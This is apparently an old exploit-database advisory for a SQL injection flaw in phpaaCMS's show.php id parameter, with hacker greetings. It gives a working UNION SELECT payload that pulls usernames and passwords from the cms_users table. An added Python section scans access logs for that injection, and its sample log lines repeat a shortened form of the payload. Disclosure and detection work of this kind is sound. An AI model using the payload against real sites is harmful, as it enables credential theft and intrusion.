# Exploit Title: phpaaCms (show.php?id=) SQL Injection Vulnerability
# Software: http://www.phpaa.cn
# Tested on: win 7
# Category: webapp
# Code: n/a

MWUHH to Bl00dMafia: KashmiriMafia, Mirpuri, Mirzatun: gula, Boby, Mota & aSIM^JARRAL
Gr33tz to all Pakistani hackers

----- [ Founder ] -----
Shafiq-Ur-rehman

----- [ Email ] -----
aol.shafiq@gmail.com

----- [ Title ] -----
PHPAA (show.php) SQL Injection Vulnerability

----- [ Vendor ] -----
http://www.phpaa.cn

----- [ SQL Injection ] -----
Put [SQL CODE]
[Link] http://server/phpaaCMS/show.php?id=1[SQL CODE]

----- [ Live Link(s) ] ----- {Tested On}
[SQLi] http:///show.php?id=1[CODE]
[SQLi] http://server/phpaaCMS/show.php?id=-194 union all select 1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15 from cms_users--

Thanks to all: www.Exploit-db.com | Ksecurity-team Members
muwhhh >>> http://www.sql-injection-tools.blogspot.com

>> Live Long Pakistan << >> Live Long Azad Kashmir << >> Proud To Be A Kashmiri+Pakistani <<

Bug discovered: 4 July 2010
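
----- [ Detection (added example) ] -----
The script below is an added example, not part of the original advisory or of phpaaCMS: it scans web server access logs for show.php requests whose id parameter is not a plain integer and marks UNION SELECT attempts like the one shown above. The log lines are constructed samples, and the combined log format, the integer-only id rule and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate show.php id is a plain non-negative integer.
VALID_ID_RE = re.compile(r"\d{1,10}")
# UNION [ALL] SELECT, tolerating whitespace or /**/ padding between keywords.
PAD = r"(?:\s|/\*.*?\*/)+"
UNION_RE = re.compile("union" + PAD + "(?:all" + PAD + ")?select", re.I | re.S)

# Constructed sample log lines (documentation IP range, shortened payload).
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Jul/2010:10:00:01 +0000] "GET /phpaaCMS/show.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [04/Jul/2010:10:00:05 +0000] "GET /phpaaCMS/show.php?id=-194%20union%20all%20select%201,2%20from%20cms_users-- HTTP/1.1" 200 4312',
    '203.0.113.9 - - [04/Jul/2010:10:00:09 +0000] "GET /phpaaCMS/show.php?id=1%27 HTTP/1.1" 200 312',
    '203.0.113.7 - - [04/Jul/2010:10:00:12 +0000] "GET /phpaaCMS/index.php HTTP/1.1" 200 900',
]


def classify_request(target):
    """Return 'ok', 'suspicious' or 'sqli' for one request target."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/show.php"):
        return "ok"
    # parse_qs percent-decodes values and keeps every repeated id parameter.
    values = parse_qs(parts.query, keep_blank_values=True).get("id", [])
    verdict = "ok"
    for value in values:
        if VALID_ID_RE.fullmatch(value):
            continue
        if UNION_RE.search(value):
            return "sqli"
        verdict = "suspicious"  # non-numeric id without a UNION SELECT
    return verdict


def scan_log(lines):
    """Return a list of (line_number, verdict, target) for flagged requests."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        verdict = classify_request(match.group(1))
        if verdict != "ok":
            hits.append((number, verdict, match.group(1)))
    return hits
```

Calling scan_log(SAMPLE_LOG) flags the second and third sample lines. Double-encoded payloads and POST bodies are not covered by this check.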